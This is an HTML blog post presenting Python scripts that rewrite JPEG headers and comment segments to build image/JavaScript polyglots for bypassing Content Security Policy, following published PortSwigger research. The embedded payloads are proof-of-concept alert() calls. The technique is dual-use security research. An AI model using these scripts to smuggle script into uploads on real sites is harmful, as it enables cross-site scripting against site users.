<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Inspired by the Gareth Heyes article I haven’t found any tool to automatticaly generate a polyglot image like that, so I decide to do my own. This is tool is simple, the user need to pass in the first">
<meta property="og:type" content="article">
<meta property="og:title" content="Complement Scripts for polyglot jpg&#39;s">
<meta property="og:url" content="http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/index.html">
<meta property="og:site_name" content="Guilherme Keerok">
<meta property="og:description" content="Inspired by the Gareth Heyes article I haven’t found any tool to automatticaly generate a polyglot image like that, so I decide to do my own. This is tool is simple, the user need to pass in the first">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-07-29T22:24:05.000Z">
<meta property="article:modified_time" content="2022-09-01T01:25:17.497Z">
<meta property="article:author" content="Guilherme Keerok">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Complement Scripts for polyglot jpg&#39;s</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2022/07/29/Progress-report-Jul-2022/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2022/06/27/Progress-report-Jun-2022/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&text=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&title=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&is_video=false&description=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Complement Scripts for polyglot jpg&#39;s&body=Check out this article: http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&title=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&title=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&title=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&title=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&name=Complement Scripts for polyglot jpg&#39;s&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&t=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Reference"><span class="toc-number">1.</span> <span class="toc-text">Reference</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Complement Scripts for polyglot jpg&#39;s
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Guilherme Keerok</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-07-29T22:24:05.000Z" itemprop="datePublished">2022-07-29</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>Inspired by the <a target="_blank" rel="noopener" href="https://twitter.com/garethheyes">Gareth Heyes</a> <a target="_blank" rel="noopener" href="https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs">article</a> I haven’t found any tool to automatticaly generate a polyglot image like that, so I decide to do my own.</p>
<p>This is tool is simple, the user need to pass in the first argument a normal image (a valid image) and in the second argument a output name for the new image:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python polyglothing.py image.jpg out.jpg</span><br></pre></td></tr></table></figure>


<p>Doesn’t have too much explain here. Anyway I comeback to the Gareth Heyes article recently because I’ve found a bug exactly like that however my image need to have a specific width &amp; height, so I was almost forced to write this tool. However playing with the image provided by the portswigger another problem came, when I change the payload of the image this image become a invalid Image. I resolved learn a little more about it and have created the following code. This is a simple code that receive the portswigger image and exchange the payload and also exchange the dimensions.</p>
<p>padding: 2f2a &#x3D; 12074</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;../out222.jpg&#x27;</span>,<span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    data = f.read().<span class="built_in">hex</span>()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">commentTable</span>(<span class="params">hexStr,payload</span>):</span><br><span class="line">    afterComment = hexStr.split(<span class="string">&quot;fffe00&quot;</span>)[<span class="number">0</span>]</span><br><span class="line">    initComment = hexStr.split(<span class="string">&quot;fffe00&quot;</span>)[<span class="number">1</span>] <span class="comment"># application0 ffe0/16</span></span><br><span class="line">    finalComment = initComment.split(<span class="string">&#x27;ffdb&#x27;</span>,<span class="number">1</span>)[<span class="number">1</span>] <span class="comment"># quantization table ffdb/67</span></span><br><span class="line">    payloadLength = <span class="built_in">hex</span>(<span class="built_in">len</span>(payload)+<span class="number">2</span>)</span><br><span class="line">    hexPayload = payload.encode(<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">    payloadResult = payloadLength.split(<span class="string">&quot;0x&quot;</span>)[<span class="number">1</span>]</span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">len</span>(payloadResult) != <span class="number">2</span>):</span><br><span class="line">        new_hex = afterComment+<span class="string">&quot;fffe00&quot;</span>+<span class="built_in">str</span>(payloadResult)+hexPayload.<span class="built_in">hex</span>()+<span class="string">&quot;ffdb&quot;</span>+finalComment</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        new_hex=afterComment+<span class="string">&quot;fffe00&quot;</span>+<span class="built_in">str</span>(payloadLength.split(<span class="string">&quot;0x&quot;</span>)[<span class="number">1</span>])+hexPayload.<span class="built_in">hex</span>()+<span class="string">&quot;ffdb&quot;</span>+finalComment</span><br><span class="line">    <span class="keyword">return</span> new_hex</span><br><span class="line"></span><br><span class="line">comment = commentTable(data,<span class="string">&quot;*/=alert(1337)/*&quot;</span>)</span><br><span class="line"><span class="built_in">print</span>(comment)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">binFile = <span class="built_in">open</span>(<span class="string">&#x27;newImage.jpg&#x27;</span>,<span class="string">&#x27;wb+&#x27;</span>)</span><br><span class="line">binFile.write(binascii.unhexlify(comment))</span><br><span class="line">binFile.close()</span><br></pre></td></tr></table></figure>

<p>Also, I’ve created another simple code to create a image without a header and put your payload there, this can be more useful in a lot of other cases.</p>
<p>To start using this, you need to be sure that the jpg image doesn’t have any header, so, to do that I’ve used imagemagick.</p>
<p>padding: 093a &#x3D; 2362</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">convert original.jpg cat.jpg</span><br></pre></td></tr></table></figure>

<p>and then you just need to pass </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;cat.jpg&#x27;</span>,<span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    data = f.read().<span class="built_in">hex</span>()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ident</span>(<span class="params">hexStr</span>):</span><br><span class="line">    identifier = hexStr.split(<span class="string">&quot;ffe0&quot;</span>,<span class="number">1</span>)</span><br><span class="line">    middle = identifier[<span class="number">1</span>].split(<span class="string">&quot;4a464946&quot;</span>)[<span class="number">1</span>]</span><br><span class="line">    middle = <span class="built_in">list</span>(middle)</span><br><span class="line">    middle[<span class="number">0</span>] = <span class="string">&quot;2&quot;</span></span><br><span class="line">    middle[<span class="number">1</span>] = <span class="string">&quot;f&quot;</span></span><br><span class="line">    middle[<span class="number">2</span>] = <span class="string">&quot;2&quot;</span></span><br><span class="line">    middle[<span class="number">3</span>] = <span class="string">&quot;a&quot;</span></span><br><span class="line">    middle = <span class="string">&#x27;&#x27;</span>.join(middle)</span><br><span class="line">    <span class="keyword">return</span> identifier[<span class="number">0</span>]+<span class="string">&quot;ffe0093a4a464946&quot;</span>+middle</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">imageEnd</span>(<span class="params">hexStr</span>):</span><br><span class="line">    endI = hexStr.rsplit(<span class="string">&quot;ffd9&quot;</span>,<span class="number">1</span>)[<span class="number">0</span>]</span><br><span class="line">    <span class="keyword">return</span> endI+<span class="string">&quot;2a2f2f2fffd9&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">padding</span>(<span class="params">hexStr,payload</span>):</span><br><span class="line">    ffdb = hexStr.split(<span class="string">&quot;ffdb&quot;</span>,<span class="number">1</span>)</span><br><span class="line">    ffdb[<span class="number">0</span>] += <span class="string">&quot;00&quot;</span>*<span class="number">2348</span></span><br><span class="line">    ffdb[<span class="number">0</span>] += payload.encode(<span class="string">&#x27;utf-8&#x27;</span>).<span class="built_in">hex</span>()+<span class="string">&quot;ffdb&quot;</span></span><br><span class="line">    restore = ffdb[<span class="number">0</span>].split(<span class="string">&quot;ffd8ffe0&quot;</span>)</span><br><span class="line">    fBytes = restore[<span class="number">1</span>][<span class="number">0</span>:<span class="number">28</span>]</span><br><span class="line">    <span class="keyword">return</span> ffdb[<span class="number">0</span>]+ffdb[<span class="number">1</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">x = ident(data)</span><br><span class="line">ending = imageEnd(x)</span><br><span class="line">pad = padding(ending,<span class="string">&quot;*/=alert(1);/*&quot;</span>)</span><br><span class="line"><span class="built_in">print</span>(binascii.unhexlify(padding(ending,<span class="string">&quot;*/=alert(1)/*&quot;</span>)))</span><br><span class="line">binFile = <span class="built_in">open</span>(<span class="string">&#x27;null_newImage.jpg&#x27;</span>,<span class="string">&#x27;wb+&#x27;</span>)</span><br><span class="line">binFile.write(binascii.unhexlify(pad))</span><br><span class="line">binFile.close()</span><br></pre></td></tr></table></figure>

<h2 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h2><p>To understand and write this scripts I used the same reference of the previous mentioned article:</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/corkami/pics">https://github.com/corkami/pics</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/corkami/pics/blob/master/binary/JPG.png">https://github.com/corkami/pics/blob/master/binary/JPG.png</a></li>
</ul>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Reference"><span class="toc-number">1.</span> <span class="toc-text">Reference</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&text=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&title=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&is_video=false&description=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Complement Scripts for polyglot jpg&#39;s&body=Check out this article: http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&title=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&title=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&title=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&title=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&name=Complement Scripts for polyglot jpg&#39;s&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2022/07/29/Complement-Scripts-for-polyglot-jpg-s/&t=Complement Scripts for polyglot jpg&#39;s"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2022
    Guilherme Keerok
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
